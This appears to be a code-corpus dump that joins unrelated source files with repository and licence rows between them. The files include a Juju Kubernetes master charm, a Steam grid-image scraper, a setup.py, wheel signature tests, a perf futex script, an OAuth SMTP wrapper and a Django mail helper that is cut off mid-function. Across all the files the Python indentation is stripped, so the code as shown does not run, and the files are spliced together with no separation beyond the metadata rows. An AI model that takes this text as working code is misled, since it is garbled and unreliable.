@when('authentication.setup')
@when('leadership.is_leader')
def send_tokens(kube_control):
"""Send the tokens to the workers."""
kubelet_token = get_token('kubelet')
proxy_token = get_token('kube_proxy')
admin_token = get_token('admin')
# Send the data
requests = kube_control.auth_user()
for request in requests:
kube_control.sign_auth_request(request[0], kubelet_token,
proxy_token, admin_token)
@when_not('kube-control.connected')
def missing_kube_control():
"""Inform the operator master is waiting for a relation to workers.
    If deploying via bundle this won't happen, but if the operator is upgrading
    a charm in a deployment that pre-dates the kube-control relation, it'll be
missing.
"""
hookenv.status_set('blocked', 'Waiting for workers.')
@when('kube-api-endpoint.available')
def push_service_data(kube_api):
''' Send configuration to the load balancer, and close access to the
public interface '''
kube_api.configure(port=6443)
@when('certificates.available')
def send_data(tls):
'''Send the data that is required to create a server certificate for
this server.'''
# Use the public ip of this unit as the Common Name for the certificate.
common_name = hookenv.unit_public_ip()
# Get the SDN gateway based on the cidr address.
kubernetes_service_ip = get_kubernetes_service_ip()
domain = hookenv.config('dns_domain')
# Create SANs that the tls layer will add to the server cert.
sans = [
hookenv.unit_public_ip(),
hookenv.unit_private_ip(),
socket.gethostname(),
kubernetes_service_ip,
'kubernetes',
'kubernetes.{0}'.format(domain),
'kubernetes.default',
'kubernetes.default.svc',
'kubernetes.default.svc.{0}'.format(domain)
]
# Create a path safe name by removing path characters from the unit name.
certificate_name = hookenv.local_unit().replace('/', '_')
# Request a server cert with this information.
tls.request_server_cert(common_name, sans, certificate_name)
@when('kubernetes-master.components.started')
def configure_cdk_addons():
''' Configure CDK addons '''
remove_state('cdk-addons.configured')
dbEnabled = str(hookenv.config('enable-dashboard-addons')).lower()
args = [
'arch=' + arch(),
'dns-ip=' + get_dns_ip(),
'dns-domain=' + hookenv.config('dns_domain'),
'enable-dashboard=' + dbEnabled
]
check_call(['snap', 'set', 'cdk-addons'] + args)
if not addons_ready():
hookenv.status_set('waiting', 'Waiting to retry addon deployment')
remove_state('cdk-addons.configured')
return
set_state('cdk-addons.configured')
@retry(times=3, delay_secs=20)
def addons_ready():
"""
    Test if the addons got installed
    Returns: True if the addons got applied
"""
try:
check_call(['cdk-addons.apply'])
return True
except CalledProcessError:
hookenv.log("Addons are not ready yet.")
return False
@when('loadbalancer.available', 'certificates.ca.available',
'certificates.client.cert.available', 'authentication.setup')
def loadbalancer_kubeconfig(loadbalancer, ca, client):
# Get the potential list of loadbalancers from the relation object.
hosts = loadbalancer.get_addresses_ports()
# Get the public address of loadbalancers so users can access the cluster.
address = hosts[0].get('public-address')
# Get the port of the loadbalancer so users can access the cluster.
port = hosts[0].get('port')
server = 'https://{0}:{1}'.format(address, port)
build_kubeconfig(server)
@when('certificates.ca.available', 'certificates.client.cert.available',
'authentication.setup')
@when_not('loadbalancer.available')
def create_self_config(ca, client):
'''Create a kubernetes configuration for the master unit.'''
server = 'https://{0}:{1}'.format(hookenv.unit_get('public-address'), 6443)
build_kubeconfig(server)
@when('ceph-storage.available')
def ceph_state_control(ceph_admin):
''' Determine if we should remove the state that controls the re-render
and execution of the ceph-relation-changed event because there
are changes in the relationship data, and we should re-render any
configs, keys, and/or service pre-reqs '''
ceph_relation_data = {
'mon_hosts': ceph_admin.mon_hosts(),
'fsid': ceph_admin.fsid(),
'auth_supported': ceph_admin.auth(),
'hostname': socket.gethostname(),
'key': ceph_admin.key()
}
# Re-execute the rendering if the data has changed.
if data_changed('ceph-config', ceph_relation_data):
remove_state('ceph-storage.configured')
@when('ceph-storage.available')
@when_not('ceph-storage.configured')
def ceph_storage(ceph_admin):
'''Ceph on kubernetes will require a few things - namely a ceph
configuration, and the ceph secret key file used for authentication.
    This method will install the client package, and render the requisite files
in order to consume the ceph-storage relation.'''
ceph_context = {
'mon_hosts': ceph_admin.mon_hosts(),
'fsid': ceph_admin.fsid(),
'auth_supported': ceph_admin.auth(),
'use_syslog': "true",
'ceph_public_network': '',
'ceph_cluster_network': '',
'loglevel': 1,
'hostname': socket.gethostname(),
}
# Install the ceph common utilities.
apt_install(['ceph-common'], fatal=True)
etc_ceph_directory = '/etc/ceph'
if not os.path.isdir(etc_ceph_directory):
os.makedirs(etc_ceph_directory)
charm_ceph_conf = os.path.join(etc_ceph_directory, 'ceph.conf')
# Render the ceph configuration from the ceph conf template
render('ceph.conf', charm_ceph_conf, ceph_context)
# The key can rotate independently of other ceph config, so validate it
admin_key = os.path.join(etc_ceph_directory,
'ceph.client.admin.keyring')
try:
with open(admin_key, 'w') as key_file:
key_file.write("[client.admin]\n\tkey = {}\n".format(
ceph_admin.key()))
except IOError as err:
hookenv.log("IOError writing admin.keyring: {}".format(err))
# Enlist the ceph-admin key as a kubernetes secret
if ceph_admin.key():
encoded_key = base64.b64encode(ceph_admin.key().encode('utf-8'))
else:
# We didn't have a key, and cannot proceed. Do not set state and
# allow this method to re-execute
return
context = {'secret': encoded_key.decode('ascii')}
render('ceph-secret.yaml', '/tmp/ceph-secret.yaml', context)
try:
# At first glance this is deceptive. The apply stanza will create if
# it doesn't exist, otherwise it will update the entry, ensuring our
# ceph-secret is always reflective of what we have in /etc/ceph
# assuming we have invoked this anytime that file would change.
cmd = ['kubectl', 'apply', '-f', '/tmp/ceph-secret.yaml']
check_call(cmd)
os.remove('/tmp/ceph-secret.yaml')
except:
# the enlistment in kubernetes failed, return and prepare for re-exec
return
# when complete, set a state relating to configuration of the storage
# backend that will allow other modules to hook into this and verify we
# have performed the necessary pre-req steps to interface with a ceph
# deployment.
set_state('ceph-storage.configured')
@when('nrpe-external-master.available')
@when_not('nrpe-external-master.initial-config')
def initial_nrpe_config(nagios=None):
set_state('nrpe-external-master.initial-config')
update_nrpe_config(nagios)
@when('kubernetes-master.components.started')
@when('nrpe-external-master.available')
@when_any('config.changed.nagios_context',
'config.changed.nagios_servicegroups')
def update_nrpe_config(unused=None):
services = (
'snap.kube-apiserver.daemon',
'snap.kube-controller-manager.daemon',
'snap.kube-scheduler.daemon'
)
hostname = nrpe.get_nagios_hostname()
current_unit = nrpe.get_nagios_unit_name()
nrpe_setup = nrpe.NRPE(hostname=hostname)
nrpe.add_init_service_checks(nrpe_setup, services, current_unit)
nrpe_setup.write()
@when_not('nrpe-external-master.available')
@when('nrpe-external-master.initial-config')
def remove_nrpe_config(nagios=None):
remove_state('nrpe-external-master.initial-config')
# List of systemd services for which the checks will be removed
services = (
'snap.kube-apiserver.daemon',
'snap.kube-controller-manager.daemon',
'snap.kube-scheduler.daemon'
)
# The current nrpe-external-master interface doesn't handle a lot of logic,
# use the charm-helpers code for now.
hostname = nrpe.get_nagios_hostname()
nrpe_setup = nrpe.NRPE(hostname=hostname)
for service in services:
nrpe_setup.remove_check(shortname=service)
def is_privileged():
"""Return boolean indicating whether or not to set allow-privileged=true.
"""
privileged = hookenv.config('allow-privileged')
if privileged == 'auto':
return is_state('kubernetes-master.gpu.enabled')
else:
return privileged == 'true'
@when('config.changed.allow-privileged')
@when('kubernetes-master.components.started')
def on_config_allow_privileged_change():
"""React to changed 'allow-privileged' config value.
"""
remove_state('kubernetes-master.components.started')
remove_state('config.changed.allow-privileged')
@when('kube-control.gpu.available')
@when('kubernetes-master.components.started')
@when_not('kubernetes-master.gpu.enabled')
def on_gpu_available(kube_control):
"""The remote side (kubernetes-worker) is gpu-enabled.
We need to run in privileged mode.
"""
config = hookenv.config()
if config['allow-privileged'] == "false":
hookenv.status_set(
'active',
'GPUs available. Set allow-privileged="auto" to enable.'
)
return
remove_state('kubernetes-master.components.started')
set_state('kubernetes-master.gpu.enabled')
@when('kubernetes-master.gpu.enabled')
@when_not('kubernetes-master.privileged')
def disable_gpu_mode():
"""We were in gpu mode, but the operator has set allow-privileged="false",
so we can't run in gpu mode anymore.
"""
remove_state('kubernetes-master.gpu.enabled')
@hook('stop')
def shutdown():
""" Stop the kubernetes master services
"""
service_stop('snap.kube-apiserver.daemon')
service_stop('snap.kube-controller-manager.daemon')
service_stop('snap.kube-scheduler.daemon')
def arch():
'''Return the package architecture as a string. Raise an exception if the
architecture is not supported by kubernetes.'''
# Get the package architecture for this system.
architecture = check_output(['dpkg', '--print-architecture']).rstrip()
# Convert the binary result into a string.
architecture = architecture.decode('utf-8')
return architecture
def build_kubeconfig(server):
'''Gather the relevant data for Kubernetes configuration objects and create
a config object with that information.'''
# Get the options from the tls-client layer.
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
ca_exists = ca and os.path.isfile(ca)
client_pass = get_password('basic_auth.csv', 'admin')
# Do we have everything we need?
if ca_exists and client_pass:
# Create an absolute path for the kubeconfig file.
kubeconfig_path = os.path.join(os.sep, 'home', 'ubuntu', 'config')
# Create the kubeconfig on this system so users can access the cluster.
create_kubeconfig(kubeconfig_path, server, ca,
user='admin', password=client_pass)
# Make the config file readable by the ubuntu users so juju scp works.
cmd = ['chown', 'ubuntu:ubuntu', kubeconfig_path]
check_call(cmd)
def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None,
user='ubuntu', context='juju-context',
cluster='juju-cluster', password=None, token=None):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
if not key and not certificate and not password and not token:
raise ValueError('Missing authentication mechanism.')
# token and password are mutually exclusive. Error early if both are
# present. The developer has requested an impossible situation.
# see: kubectl config set-credentials --help
if token and password:
raise ValueError('Token and Password are mutually exclusive.')
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Delete old users
cmd = 'kubectl config --kubeconfig={0} unset users'
check_call(split(cmd.format(kubeconfig)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} ' \
'set-credentials {1} '.format(kubeconfig, user)
if key and certificate:
cmd = '{0} --client-key={1} --client-certificate={2} '\
'--embed-certs=true'.format(cmd, key, certificate)
if password:
cmd = "{0} --username={1} --password={2}".format(cmd, user, password)
# This is mutually exclusive from password. They will not work together.
if token:
cmd = "{0} --token={1}".format(cmd, token)
check_call(split(cmd))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
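# Hedged illustration (not part of the charm flow): how build_kubeconfig()
# above drives this helper. The CA path and password are placeholders, not
# values read from this charm at runtime.
#
#     create_kubeconfig('/home/ubuntu/config', 'https://10.0.0.1:6443',
#                       '/root/cdk/ca.crt', user='admin', password='secret')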
def get_dns_ip():
'''Get an IP address for the DNS server on the provided cidr.'''
interface = ipaddress.IPv4Interface(service_cidr())
# Add .10 at the end of the network
ip = interface.network.network_address + 10
return ip.exploded
def get_kubernetes_service_ip():
'''Get the IP address for the kubernetes service based on the cidr.'''
interface = ipaddress.IPv4Interface(service_cidr())
# Add .1 at the end of the network
ip = interface.network.network_address + 1
return ip.exploded
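# Worked example of the address arithmetic above (assumes the charm's usual
# default service-cidr of 10.152.183.0/24; purely illustrative, not used at
# runtime):
#   kubernetes service IP (network + 1)  -> 10.152.183.1
#   cluster DNS IP        (network + 10) -> 10.152.183.10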
def handle_etcd_relation(reldata):
''' Save the client credentials and set appropriate daemon flags when
etcd declares itself as available'''
connection_string = reldata.get_connection_string()
# Define where the etcd tls files will be kept.
etcd_dir = '/root/cdk/etcd'
# Create paths to the etcd client ca, key, and cert file locations.
ca = os.path.join(etcd_dir, 'client-ca.pem')
key = os.path.join(etcd_dir, 'client-key.pem')
cert = os.path.join(etcd_dir, 'client-cert.pem')
# Save the client credentials (in relation data) to the paths provided.
reldata.save_client_credentials(key, cert, ca)
api_opts = FlagManager('kube-apiserver')
    # Never use stale data; always prefer what's coming in during context
    # building. If it's stale, it's because what's in unitdata is stale.
data = api_opts.data
if data.get('etcd-servers-strict') or data.get('etcd-servers'):
api_opts.destroy('etcd-cafile')
api_opts.destroy('etcd-keyfile')
api_opts.destroy('etcd-certfile')
api_opts.destroy('etcd-servers', strict=True)
api_opts.destroy('etcd-servers')
# Set the apiserver flags in the options manager
api_opts.add('etcd-cafile', ca)
api_opts.add('etcd-keyfile', key)
api_opts.add('etcd-certfile', cert)
api_opts.add('etcd-servers', connection_string, strict=True)
def configure_master_services():
''' Add remaining flags for the master services and configure snaps to use
them '''
api_opts = FlagManager('kube-apiserver')
controller_opts = FlagManager('kube-controller-manager')
scheduler_opts = FlagManager('kube-scheduler')
scheduler_opts.add('v', '2')
# Get the tls paths from the layer data.
layer_options = layer.options('tls-client')
ca_cert_path = layer_options.get('ca_certificate_path')
client_cert_path = layer_options.get('client_certificate_path')
client_key_path = layer_options.get('client_key_path')
server_cert_path = layer_options.get('server_certificate_path')
server_key_path = layer_options.get('server_key_path')
if is_privileged():
api_opts.add('allow-privileged', 'true', strict=True)
set_state('kubernetes-master.privileged')
else:
api_opts.add('allow-privileged', 'false', strict=True)
remove_state('kubernetes-master.privileged')
# Handle static options for now
api_opts.add('service-cluster-ip-range', service_cidr())
api_opts.add('min-request-timeout', '300')
api_opts.add('v', '4')
api_opts.add('tls-cert-file', server_cert_path)
api_opts.add('tls-private-key-file', server_key_path)
api_opts.add('kubelet-certificate-authority', ca_cert_path)
api_opts.add('kubelet-client-certificate', client_cert_path)
api_opts.add('kubelet-client-key', client_key_path)
api_opts.add('logtostderr', 'true')
api_opts.add('insecure-bind-address', '127.0.0.1')
api_opts.add('insecure-port', '8080')
api_opts.add('storage-backend', 'etcd2') # FIXME: add etcd3 support
admission_control = [
'Initializers',
'NamespaceLifecycle',
'LimitRanger',
'ServiceAccount',
'ResourceQuota',
'DefaultTolerationSeconds'
]
if get_version('kube-apiserver') < (1, 6):
hookenv.log('Removing DefaultTolerationSeconds from admission-control')
admission_control.remove('DefaultTolerationSeconds')
if get_version('kube-apiserver') < (1, 7):
hookenv.log('Removing Initializers from admission-control')
admission_control.remove('Initializers')
api_opts.add('admission-control', ','.join(admission_control), strict=True)
    # Default to 3 minute resync. TODO: Make this configurable?
controller_opts.add('min-resync-period', '3m')
controller_opts.add('v', '2')
controller_opts.add('root-ca-file', ca_cert_path)
controller_opts.add('logtostderr', 'true')
controller_opts.add('master', 'http://127.0.0.1:8080')
scheduler_opts.add('v', '2')
scheduler_opts.add('logtostderr', 'true')
scheduler_opts.add('master', 'http://127.0.0.1:8080')
cmd = ['snap', 'set', 'kube-apiserver'] + api_opts.to_s().split(' ')
check_call(cmd)
cmd = (
['snap', 'set', 'kube-controller-manager'] +
controller_opts.to_s().split(' ')
)
check_call(cmd)
cmd = ['snap', 'set', 'kube-scheduler'] + scheduler_opts.to_s().split(' ')
check_call(cmd)
def setup_basic_auth(password=None, username='admin', uid='admin'):
'''Create the htacces file and the tokens.'''
root_cdk = '/root/cdk'
if not os.path.isdir(root_cdk):
os.makedirs(root_cdk)
htaccess = os.path.join(root_cdk, 'basic_auth.csv')
if not password:
password = token_generator()
with open(htaccess, 'w') as stream:
stream.write('{0},{1},{2}'.format(password, username, uid))
def setup_tokens(token, username, user):
'''Create a token file for kubernetes authentication.'''
root_cdk = '/root/cdk'
if not os.path.isdir(root_cdk):
os.makedirs(root_cdk)
known_tokens = os.path.join(root_cdk, 'known_tokens.csv')
if not token:
token = token_generator()
with open(known_tokens, 'a') as stream:
stream.write('{0},{1},{2}\n'.format(token, username, user))
def get_password(csv_fname, user):
'''Get the password of user within the csv file provided.'''
root_cdk = '/root/cdk'
tokens_fname = os.path.join(root_cdk, csv_fname)
if not os.path.isfile(tokens_fname):
return None
with open(tokens_fname, 'r') as stream:
for line in stream:
record = line.split(',')
if record[1] == user:
return record[0]
return None
def get_token(username):
"""Grab a token from the static file if present. """
return get_password('known_tokens.csv', username)
def set_token(password, save_salt):
''' Store a token so it can be recalled later by token_generator.
param: password - the password to be stored
param: save_salt - the key to store the value of the token.'''
db = unitdata.kv()
db.set(save_salt, password)
return db.get(save_salt)
def token_generator(length=32):
''' Generate a random token for use in passwords and account tokens.
param: length - the length of the token to generate'''
alpha = string.ascii_letters + string.digits
token = ''.join(random.SystemRandom().choice(alpha) for _ in range(length))
return token
@retry(times=3, delay_secs=10)
def all_kube_system_pods_running():
''' Check pod status in the kube-system namespace. Returns True if all
pods are running, False otherwise. '''
cmd = ['kubectl', 'get', 'po', '-n', 'kube-system', '-o', 'json']
try:
output = check_output(cmd).decode('utf-8')
except CalledProcessError:
hookenv.log('failed to get kube-system pod status')
return False
result = json.loads(output)
for pod in result['items']:
status = pod['status']['phase']
if status != 'Running':
return False
return True
def apiserverVersion():
cmd = 'kube-apiserver --version'.split()
version_string = check_output(cmd).decode('utf-8')
return tuple(int(q) for q in re.findall("[0-9]+", version_string)[:3])
| apache-2.0 | 7,844,764,014,608,322,000 | 35.915507 | 79 | 0.667286 | false |
Codeusa/Steam-Grid-View-Image-Dumper | griddumper.py | 1 | 1594 | import sys
import os.path
from urllib2 import urlopen, HTTPError
import time
import re
def get_app_ids(appstring):
index = '"appid":'
substring = 0
while True:
substring = appstring.find(index, substring)
if substring == -1:
return
pattern = re.compile('(\"appid":)([0-9]+)')
match = pattern.match(appstring, substring)
resolve = int(match.group(2))
substring += len(match.group())
yield resolve
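def _get_app_ids_example():
    # Hedged self-check for the parser above (synthetic snippet, not real
    # Steam profile markup); never called by the script itself.
    sample = '{"appid":440,"name":"TF2"},{"appid":570,"name":"Dota 2"}'
    return list(get_app_ids(sample))  # -> [440, 570]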
username = raw_input("Enter your steam profile username: ")
profileURL = "http://steamcommunity.com/id/" + username + "/games?tab=all"
stream = urlopen(profileURL)
if stream is None:
print("Stream produced nothing or did not load, failing obviously")
sys.exit()
try:
os.mkdir("griddump")
except OSError:
pass
app_ids = []
for line in stream:
line = str(line)
for appid in get_app_ids(line):
app_ids.append(appid)
for appid in app_ids:
path = "griddump/" + str(appid) + ".png"
    '''
    By requesting header.png instead of header.jpg you can grab other
    versions of the grid image. For example, Modern Warfare produced a
    multiplayer grid icon.
    '''
profileURL = "http://cdn.steampowered.com/v/gfx/apps/" + str(appid) + "/header.jpg"
if os.path.exists(path):
print("Already saved this one, moving on. AppID: " + str(appid))
continue
try:
stream = urlopen(profileURL)
except HTTPError:
print("Can't stream URL " + str(appid))
continue
f = open(path, 'wb')
f.write(stream.read())
print("Downloading Grid for AppID: " + str(appid))
| gpl-3.0 | -4,743,272,856,986,844,000 | 25.566667 | 87 | 0.624216 | false |
jyi/ITSP | prophet-gpl/crawler/python-github3-master/setup.py | 6 | 1203 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from os.path import join
from setuptools import setup, find_packages
import pygithub3
# Odd hack to get 'python setup.py test' working on py2.7
try:
import multiprocessing
import logging
except ImportError:
pass
setup(
name=pygithub3.__name__,
version=pygithub3.__version__,
author=pygithub3.__author__,
author_email=pygithub3.__email__,
url='https://github.com/copitux/python-github3',
description='Python wrapper for the github v3 api',
long_description=open('README.rst').read(),
license='ISC',
packages=find_packages(exclude=['*tests*']),
test_suite='nose.collector',
tests_require=[
'nose',
'mock',
],
install_requires=map(str.strip, open(join('requirements', 'base.txt'))),
include_package_data=True,
classifiers=(
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: ISC License (ISCL)',
'Operating System :: OS Independent',
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
),
)
| mit | 316,954,749,045,166,800 | 27.642857 | 76 | 0.632585 | false |
carsongee/edx-platform | common/djangoapps/config_models/__init__.py | 220 | 2002 | """
Model-Based Configuration
=========================
This app allows other apps to easily define a configuration model
that can be hooked into the admin site to allow configuration management
with auditing.
Installation
------------
Add ``config_models`` to your ``INSTALLED_APPS`` list.
Usage
-----
Create a subclass of ``ConfigurationModel``, with fields for each
value that needs to be configured::
class MyConfiguration(ConfigurationModel):
        frobble_timeout = IntegerField(default=10)
        frazzle_target = TextField(default="debug")
This is a normal django model, so it must be synced and migrated as usual.
The default values for the fields in the ``ConfigurationModel`` will be
used if no configuration has yet been created.
Register that class with the Admin site, using the ``ConfigurationAdminModel``::
from django.contrib import admin
from config_models.admin import ConfigurationModelAdmin
admin.site.register(MyConfiguration, ConfigurationModelAdmin)
Use the configuration in your code::
def my_view(self, request):
config = MyConfiguration.current()
fire_the_missiles(config.frazzle_target, timeout=config.frobble_timeout)
Use the admin site to add new configuration entries. The most recently created
entry is considered to be ``current``.
Configuration
-------------
The current ``ConfigurationModel`` will be cached in the ``configuration`` django cache,
or in the ``default`` cache if ``configuration`` doesn't exist. You can specify the cache
timeout in each ``ConfigurationModel`` by setting the ``cache_timeout`` property.
You can change the name of the cache key used by the ``ConfigurationModel`` by overriding
the ``cache_key_name`` function.
Extension
---------
``ConfigurationModels`` are just django models, so they can be extended with new fields
and migrated as usual. Newly added fields must have default values and should be nullable,
so that rollbacks to old versions of configuration work correctly.
"""
| agpl-3.0 | -7,320,066,905,892,144,000 | 31.290323 | 90 | 0.741259 | false |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/wheel/test/test_signatures.py | 565 | 1120 | from wheel import signatures
from wheel.signatures import djbec, ed25519py
from wheel.util import binary
def test_getlib():
signatures.get_ed25519ll()
def test_djbec():
djbec.dsa_test()
djbec.dh_test()
def test_ed25519py():
kp0 = ed25519py.crypto_sign_keypair(binary(' '*32))
kp = ed25519py.crypto_sign_keypair()
signed = ed25519py.crypto_sign(binary('test'), kp.sk)
ed25519py.crypto_sign_open(signed, kp.vk)
try:
ed25519py.crypto_sign_open(signed, kp0.vk)
except ValueError:
pass
else:
raise Exception("Expected ValueError")
try:
ed25519py.crypto_sign_keypair(binary(' '*33))
except ValueError:
pass
else:
raise Exception("Expected ValueError")
try:
ed25519py.crypto_sign(binary(''), binary(' ')*31)
except ValueError:
pass
else:
raise Exception("Expected ValueError")
try:
ed25519py.crypto_sign_open(binary(''), binary(' ')*31)
except ValueError:
pass
else:
raise Exception("Expected ValueError")
| mit | 355,611,683,186,622,800 | 22.851064 | 62 | 0.6125 | false |
JoeGlancy/linux | tools/perf/scripts/python/futex-contention.py | 1997 | 1508 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
| gpl-2.0 | -9,223,116,981,966,895,000 | 29.16 | 96 | 0.690318 | false |
VishvajitP/django-tastypie | tests/namespaced/tests.py | 11 | 1284 | from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import HttpRequest
from django.test import TestCase
from django.utils import simplejson as json
class NamespacedViewsTestCase(TestCase):
urls = 'namespaced.api.urls'
def test_urls(self):
from namespaced.api.urls import api
patterns = api.urls
self.assertEqual(len(patterns), 3)
self.assertEqual(sorted([pattern.name for pattern in patterns if hasattr(pattern, 'name')]), ['api_v1_top_level'])
self.assertEqual([[pattern.name for pattern in include.url_patterns if hasattr(pattern, 'name')] for include in patterns if hasattr(include, 'reverse_dict')], [['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail'], ['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail']])
self.assertRaises(NoReverseMatch, reverse, 'api_v1_top_level')
self.assertRaises(NoReverseMatch, reverse, 'special:api_v1_top_level')
self.assertEquals(reverse('special:api_v1_top_level', kwargs={'api_name': 'v1'}), '/api/v1/')
self.assertEquals(reverse('special:api_dispatch_list', kwargs={'api_name': 'v1', 'resource_name': 'notes'}), '/api/v1/notes/')
| bsd-3-clause | -4,008,991,076,824,836,000 | 60.142857 | 336 | 0.702492 | false |
ric2b/Vivaldi-browser | chromium/chrome/common/extensions/docs/examples/apps/hello-python/oauth2/clients/smtp.py | 884 | 1680 | """
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import oauth2
import smtplib
import base64
class SMTP(smtplib.SMTP):
"""SMTP wrapper for smtplib.SMTP that implements XOAUTH."""
def authenticate(self, url, consumer, token):
if consumer is not None and not isinstance(consumer, oauth2.Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, oauth2.Token):
raise ValueError("Invalid token.")
self.docmd('AUTH', 'XOAUTH %s' % \
base64.b64encode(oauth2.build_xoauth_string(url, consumer, token)))
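# Hedged usage sketch (host, port and the XOAUTH URL are placeholders for a
# Gmail-style setup; `consumer` and `token` are oauth2.Consumer/oauth2.Token
# instances created elsewhere):
#
#     conn = SMTP('smtp.gmail.com', 587)
#     conn.ehlo()
#     conn.starttls()
#     conn.ehlo()
#     conn.authenticate('https://mail.google.com/mail/b/[email protected]/smtp/',
#                       consumer, token)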
| bsd-3-clause | -8,429,839,645,670,632,000 | 39.97561 | 79 | 0.754762 | false |
edushifts/book-voyage | bookvoyage-backend/core/mail/__init__.py | 1 | 3852 | """
Tools for sending email.
"""
# Import utilities
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes, force_text
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import send_mail
from django.utils.http import urlsafe_base64_encode
# Import environment variables
from bookvoyage.settings import HOST_FRONTEND, PASSWORD_RESET_LINK, DEFAULT_FROM_EMAIL, JOURNEY_LINK
# Define logger
import logging
logger = logging.getLogger('MailUtil')
def send_owner_invitation(user):
"""
Sends user an invitation e-mail that includes a password reset link.
Adapted from https://github.com/pennersr/django-allauth/blob/master/allauth/account/forms.py
"""
user_email = user.email
# Generate password reset token
token_generator = default_token_generator
temp_key = token_generator.make_token(user)
url = HOST_FRONTEND + PASSWORD_RESET_LINK\
+ force_text(urlsafe_base64_encode((force_bytes(user.id)))) + "-" + temp_key
msg_plain = render_to_string('owner_invitation.txt', {'platformUrl': url})
msg_html = render_to_string('owner_invitation.html', {'platformUrl': url})
send_mail(
'Welcome to EDUshifts Book Voyage!',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
logger.info("Owner Invitation sent to: " + user_email)
def send_password_reset(user):
"""
    Sends the user a password reset e-mail that includes a password reset link.
Adapted from https://github.com/pennersr/django-allauth/blob/master/allauth/account/forms.py
"""
user_email = user.email
# Generate password reset token
token_generator = default_token_generator
temp_key = token_generator.make_token(user)
url = HOST_FRONTEND + PASSWORD_RESET_LINK\
+ force_text(urlsafe_base64_encode((force_bytes(user.id)))) + "-" + temp_key
msg_plain = render_to_string('password-reset.txt', {'platformUrl': url})
msg_html = render_to_string('password_reset.html', {'platformUrl': url})
send_mail(
'EDUshifts Book Voyage password reset',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
logger.info("Password reset sent to: " + user_email)
def send_holder_welcome(user, book):
"""
    Sends holder a thank-you e-mail for having registered a book, and sends them a link to the public journey.
"""
user_email = user.email
book_id = book.id
url = HOST_FRONTEND + JOURNEY_LINK + str(book_id)
msg_plain = render_to_string('holder_welcome.txt', {'platformUrl': url})
msg_html = render_to_string('holder_welcome.html', {'platformUrl': url})
send_mail(
'Welcome to EDUshifts Book Voyage!',
msg_plain,
DEFAULT_FROM_EMAIL,
[user_email],
html_message=msg_html,
)
logger.info("Holder welcome sent to: " + user_email)
def send_book_update_mass(users, book):
"""
Performs send_book_update() for multiple users.
TODO: implement send_mass_mail()
"""
for user in users:
send_book_update(user, book)
logger.info("Book updates were sent")
def send_book_update(user, book):
"""
    Sends a single holder an update on the latest book location, and sends them a link to the public journey.
"""
user_email = user.email
